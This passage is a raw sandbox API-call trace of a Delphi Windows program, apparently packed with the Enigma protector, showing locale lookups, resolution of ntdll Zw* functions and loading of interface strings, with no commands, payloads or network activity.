GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Thursday") returned 9 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Fri") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Friday") returned 7 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Sat") returned 4 [0044.295] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x13ffc74, cchData=256 | out: lpLCData="Saturday") returned 9 [0044.296] GetThreadLocale () returned 0x409 [0044.296] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="$") returned 2 [0044.296] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="0") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="0") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x13ffdc8, cchData=2 | out: lpLCData=",") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x13ffdc8, cchData=2 | out: lpLCData=".") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="2") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x13ffdc8, cchData=2 | out: lpLCData="/") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0044.320] GetThreadLocale () returned 0x409 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x13ffc9c, cchData=256 | out: lpLCData="1") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0044.320] GetThreadLocale () returned 0x409 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x13ffc9c, cchData=256 | out: lpLCData="1") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x13ffdc8, cchData=2 | out: lpLCData=":") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="AM") returned 3 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="PM") returned 3 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="0") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="0") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x13ffcd0, cchData=256 | out: lpLCData="0") returned 2 [0044.320] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x13ffdc8, cchData=2 | out: lpLCData=",") returned 2 [0044.339] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x77440000 [0044.339] GetProcAddress (hModule=0x77440000, lpProcName="VariantChangeTypeEx") returned 0x7745a610 [0044.339] GetProcAddress (hModule=0x77440000, lpProcName="VarNeg") returned 0x774a52c0 [0044.339] GetProcAddress (hModule=0x77440000, lpProcName="VarNot") returned 0x774a6560 [0044.339] GetProcAddress (hModule=0x77440000, lpProcName="VarAdd") returned 0x7747d610 [0044.340] GetProcAddress (hModule=0x77440000, lpProcName="VarSub") returned 0x7747e3e0 [0044.340] GetProcAddress (hModule=0x77440000, lpProcName="VarMul") returned 0x7747db10 [0044.340] GetProcAddress (hModule=0x77440000, lpProcName="VarDiv") returned 0x774a5800 [0044.340] GetProcAddress (hModule=0x77440000, lpProcName="VarIdiv") returned 0x774a61a0 [0044.340] GetProcAddress (hModule=0x77440000, lpProcName="VarMod") returned 0x774a6400 [0044.340] GetProcAddress (hModule=0x77440000, lpProcName="VarAnd") returned 0x77473200 [0044.340] GetProcAddress (hModule=0x77440000, lpProcName="VarOr") returned 0x774a6610 [0044.340] GetProcAddress (hModule=0x77440000, lpProcName="VarXor") returned 0x774a67b0 [0044.340] GetProcAddress (hModule=0x77440000, lpProcName="VarCmp") returned 0x774660b0 [0044.340] GetProcAddress (hModule=0x77440000, lpProcName="VarI4FromStr") returned 0x77466ec0 [0044.340] GetProcAddress (hModule=0x77440000, lpProcName="VarR4FromStr") returned 0x77473010 [0044.341] GetProcAddress (hModule=0x77440000, lpProcName="VarR8FromStr") returned 0x77473630 [0044.341] GetProcAddress (hModule=0x77440000, lpProcName="VarDateFromStr") returned 0x77468b90 [0044.341] GetProcAddress (hModule=0x77440000, lpProcName="VarCyFromStr") returned 0x77452d90 [0044.341] GetProcAddress (hModule=0x77440000, lpProcName="VarBoolFromStr") returned 0x774648f0 [0044.341] GetProcAddress (hModule=0x77440000, lpProcName="VarBstrFromCy") returned 0x77467f50 [0044.341] GetProcAddress (hModule=0x77440000, lpProcName="VarBstrFromDate") returned 0x774689c0 [0044.341] GetProcAddress (hModule=0x77440000, lpProcName="VarBstrFromBool") returned 0x774648a0 [0044.422] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x753c0000 [0044.422] GetProcAddress (hModule=0x753c0000, lpProcName="CoCreateInstanceEx") returned 0x74a52d10 [0044.422] GetProcAddress (hModule=0x753c0000, lpProcName="CoInitializeEx") returned 0x74a22590 [0044.423] GetProcAddress (hModule=0x753c0000, lpProcName="CoAddRefServerProcess") returned 0x74a4b8b0 [0044.423] GetProcAddress (hModule=0x753c0000, lpProcName="CoReleaseServerProcess") returned 0x74a4b350 [0044.423] GetProcAddress (hModule=0x753c0000, lpProcName="CoResumeClassObjects") returned 0x74a45c80 [0044.423] GetProcAddress (hModule=0x753c0000, lpProcName="CoSuspendClassObjects") returned 0x749ac190 [0044.492] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x1ec [0044.492] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1f0 [0044.492] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1f4 [0044.756] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe38 | out: lpPerformanceCount=0x13ffe38*=14063254559) returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf108*=0x0, psz="%Local, ApplicationData FOLDER%", len=0x1f | out: pbstr=0xbcf108*="%Local, ApplicationData FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf104*=0x0, psz="%AllUsers, ApplicationData FOLDER%", len=0x22 | out: pbstr=0xbcf104*="%AllUsers, ApplicationData FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf100*=0x0, psz="%Temp FOLDER%", len=0xd | out: pbstr=0xbcf100*="%Temp FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0fc*=0x0, psz="%ApplicationData FOLDER%", len=0x18 | out: pbstr=0xbcf0fc*="%ApplicationData FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0f8*=0x0, psz="%InternetCache FOLDER%", len=0x16 | out: pbstr=0xbcf0f8*="%InternetCache FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0f4*=0x0, psz="%Cookies FOLDER%", len=0x10 | out: pbstr=0xbcf0f4*="%Cookies FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0f0*=0x0, psz="%History FOLDER%", len=0x10 | out: pbstr=0xbcf0f0*="%History FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0ec*=0x0, psz="%My Pictures FOLDER%", len=0x14 | out: pbstr=0xbcf0ec*="%My Pictures FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0e8*=0x0, psz="%AllUsers, Documents FOLDER%", len=0x1c | out: pbstr=0xbcf0e8*="%AllUsers, Documents FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0e4*=0x0, psz="%Program Files, Common FOLDER%", len=0x1e | out: pbstr=0xbcf0e4*="%Program Files, Common FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0e0*=0x0, psz="%Program Files FOLDER%", len=0x16 | out: pbstr=0xbcf0e0*="%Program Files FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0dc*=0x0, psz="%My Documents FOLDER%", len=0x15 | out: pbstr=0xbcf0dc*="%My Documents FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0d8*=0x0, psz="%WINDOWS FOLDER%", len=0x10 | out: pbstr=0xbcf0d8*="%WINDOWS FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0d4*=0x0, psz="%SYSTEM FOLDER%", len=0xf | out: pbstr=0xbcf0d4*="%SYSTEM FOLDER%") returned 1 [0044.896] SysReAllocStringLen (in: pbstr=0xbcf0d0*=0x0, psz="%DEFAULT FOLDER%", len=0x10 | out: pbstr=0xbcf0d0*="%DEFAULT FOLDER%") returned 1 [0045.070] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0045.070] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x910000 [0045.268] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0045.268] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0045.268] GetProcAddress (hModule=0x77970000, lpProcName="ZwClose") returned 0x779e1de0 [0045.268] GetProcAddress (hModule=0x77970000, lpProcName="ZwSetInformationFile") returned 0x779e1f80 [0045.268] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryInformationFile") returned 0x779e1e00 [0045.268] GetProcAddress (hModule=0x77970000, lpProcName="ZwReadFile") returned 0x779e1d50 [0045.268] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateFile") returned 0x779e2260 [0045.269] GetProcAddress (hModule=0x77970000, lpProcName="ZwOpenFile") returned 0x779e2040 [0045.269] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryAttributesFile") returned 0x779e20e0 [0045.269] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateSection") returned 0x779e21b0 [0045.269] GetProcAddress (hModule=0x77970000, lpProcName="ZwMapViewOfSection") returned 0x779e1f90 [0045.269] GetProcAddress (hModule=0x77970000, lpProcName="ZwQuerySection") returned 0x779e2220 [0045.269] GetProcAddress (hModule=0x77970000, lpProcName="ZwUnmapViewOfSection") returned 0x779e1fb0 [0045.269] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryFullAttributesFile") returned 0x779e30a0 [0045.269] GetProcAddress (hModule=0x77970000, lpProcName="ZwWriteFile") returned 0x779e1d70 [0045.269] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryObject") returned 0x779e1df0 [0045.269] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryDirectoryFile") returned 0x779e2060 [0045.270] GetProcAddress (hModule=0x77970000, lpProcName="ZwOpenSection") returned 0x779e2080 [0045.270] GetProcAddress (hModule=0x77970000, lpProcName="ZwDuplicateObject") returned 0x779e20d0 [0045.270] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryVolumeInformationFile") returned 0x779e21a0 [0045.270] GetProcAddress (hModule=0x77970000, lpProcName="ZwDeleteFile") returned 0x779e29b0 [0045.270] GetProcAddress (hModule=0x77970000, lpProcName="ZwLockFile") returned 0x779e2d30 [0045.270] GetProcAddress (hModule=0x77970000, lpProcName="ZwUnlockFile") returned 0x779e38d0 [0045.270] GetProcAddress (hModule=0x77970000, lpProcName="ZwTerminateProcess") returned 0x779e1fd0 [0045.270] GetProcAddress (hModule=0x77970000, lpProcName="ZwOpenKey") returned 0x779e1e10 [0045.270] GetProcAddress (hModule=0x77970000, lpProcName="ZwEnumerateValueKey") returned 0x779e1e20 [0045.270] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryKey") returned 0x779e1e50 [0045.270] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryValueKey") returned 0x779e1e60 [0045.271] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateKey") returned 0x779e1ee0 [0045.271] GetProcAddress (hModule=0x77970000, lpProcName="ZwEnumerateKey") returned 0x779e2030 [0045.271] GetProcAddress (hModule=0x77970000, lpProcName="ZwSetValueKey") returned 0x779e2310 [0045.271] GetProcAddress (hModule=0x77970000, lpProcName="ZwDeleteKey") returned 0x779e29c0 [0045.271] GetProcAddress (hModule=0x77970000, lpProcName="ZwDeleteValueKey") returned 0x779e29f0 [0045.271] GetProcAddress (hModule=0x77970000, lpProcName="ZwFlushKey") returned 0x779e2b10 [0045.271] GetProcAddress (hModule=0x77970000, lpProcName="ZwLoadKey") returned 0x779e2d00 [0045.271] GetProcAddress (hModule=0x77970000, lpProcName="ZwLoadKey2") returned 0x779e2d10 [0045.271] GetProcAddress (hModule=0x77970000, lpProcName="ZwNotifyChangeKey") returned 0x779e2df0 [0045.271] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryMultipleValueKey") returned 0x779e3180 [0045.271] GetProcAddress (hModule=0x77970000, lpProcName="ZwReplaceKey") returned 0x779e3380 [0045.272] GetProcAddress (hModule=0x77970000, lpProcName="ZwRestoreKey") returned 0x779e33e0 [0045.272] GetProcAddress (hModule=0x77970000, lpProcName="ZwSaveKey") returned 0x779e3460 [0045.272] GetProcAddress (hModule=0x77970000, lpProcName="ZwSetInformationKey") returned 0x779e35c0 [0045.272] GetProcAddress (hModule=0x77970000, lpProcName="ZwUnloadKey") returned 0x779e38a0 [0045.272] GetProcAddress (hModule=0x77970000, lpProcName="ZwAccessCheck") returned 0x779e1cf0 [0045.272] GetProcAddress (hModule=0x77970000, lpProcName="ZwExtendSection") returned 0x779e2aa0 [0045.272] GetProcAddress (hModule=0x77970000, lpProcName="ZwFlushBuffersFile") returned 0x779e21c0 [0045.272] GetProcAddress (hModule=0x77970000, lpProcName="ZwFsControlFile") returned 0x779e20a0 [0045.272] GetProcAddress (hModule=0x77970000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x779e2de0 [0045.272] GetProcAddress (hModule=0x77970000, lpProcName="ZwQuerySecurityObject") returned 0x779e31f0 [0045.276] GetProcAddress (hModule=0x77970000, lpProcName="ZwSetSecurityObject") returned 0x779e36b0 [0045.276] GetProcAddress (hModule=0x77970000, lpProcName="ZwSetVolumeInformationFile") returned 0x779e3760 [0045.276] GetProcAddress (hModule=0x77970000, lpProcName="ZwOpenKeyEx") returned 0x779e2e60 [0045.277] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateProcess") returned 0x779e2830 [0045.277] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateProcessEx") returned 0x779e21e0 [0045.277] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateUserProcess") returned 0x779e2910 [0045.277] GetProcAddress (hModule=0x77970000, lpProcName="ZwResumeThread") returned 0x779e2230 [0045.277] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateThread") returned 0x779e21f0 [0045.277] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryInformationProcess") returned 0x779e1e80 [0045.277] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryVirtualMemory") returned 0x779e1f40 [0045.277] GetProcAddress (hModule=0x77970000, lpProcName="ZwDeviceIoControlFile") returned 0x779e1d60 [0045.277] GetProcAddress (hModule=0x77970000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x779e38f0 [0045.277] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryDirectoryFileEx") returned 0x0 [0045.277] VirtualFree (lpAddress=0x910000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0045.278] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0045.279] GetProcAddress (hModule=0x77970000, lpProcName="ZwProtectVirtualMemory") returned 0x779e2210 [0045.279] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0045.279] GetProcAddress (hModule=0x77970000, lpProcName="ZwClose") returned 0x779e1de0 [0045.279] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0045.279] GetProcAddress (hModule=0x77970000, lpProcName="ZwQueryInformationFile") returned 0x779e1e00 [0045.279] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0045.279] GetProcAddress (hModule=0x77970000, lpProcName="ZwSetInformationFile") returned 0x779e1f80 [0045.279] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0045.279] GetProcAddress (hModule=0x77970000, lpProcName="ZwCreateFile") returned 0x779e2260 [0045.279] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0045.280] GetProcAddress (hModule=0x77970000, lpProcName="ZwWriteFile") returned 0x779e1d70 [0045.280] QueryPerformanceCounter (in: lpPerformanceCount=0x13ffe38 | out: lpPerformanceCount=0x13ffe38*=14103536208) returned 1 [0045.280] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x1) returned 0x6d0000 [0045.280] SysReAllocStringLen (in: pbstr=0xbcf998*=0x0, psz="enigma_ide.dll", len=0xe | out: pbstr=0xbcf998*="enigma_ide.dll") returned 1 [0046.300] ReleaseDC (hWnd=0x0, hDC=0x10105d6) returned 1 [0046.654] ReleaseDC (hWnd=0x0, hDC=0x10105d6) returned 1 [0046.654] GetStockObject (i=7) returned 0xb00017 [0046.654] GetStockObject (i=5) returned 0x900015 [0046.654] GetStockObject (i=13) returned 0x8a01c2 [0046.654] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0046.654] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0046.704] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x750c0000 [0046.749] LoadStringA (in: hInstance=0xa9a000, uID=0xff28, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff27, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff26, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff25, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff24, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff23, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff22, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff21, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff20, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff3f, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff3e, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff3d, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff3c, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff3b, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff3a, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff39, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff38, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0046.750] LoadStringA (in: hInstance=0xa9a000, uID=0xff37, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0046.876] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc151 [0047.037] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc196 [0047.037] GetCurrentThreadId () returned 0x13dc [0047.086] GlobalAddAtomA (lpString="EnigmaWndProcPtr00A90000000013DC") returned 0xc0cc [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfee3, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfee2, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfee1, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfee0, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfeff, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfefe, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfefd, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfefc, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfefb, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfefa, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfef9, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0047.234] LoadStringA (in: hInstance=0xa9a000, uID=0xfef8, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xfef7, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xfef6, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xfef5, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xfef4, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xfef3, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xfef2, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xfef1, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xfef0, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff0f, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff0e, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff0d, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff0c, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff0b, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff0a, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff09, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff08, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff07, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff06, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff05, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff04, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff03, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff02, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff01, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff00, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff1f, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff1e, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff1d, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff1c, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff1b, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff1a, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff19, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff18, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff17, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff16, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0047.235] LoadStringA (in: hInstance=0xa9a000, uID=0xff15, lpBuffer=0x13ffa28, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0047.255] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc195 [0047.476] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc198 [0047.526] GetModuleHandleA (lpModuleName="comctl32.dll") returned 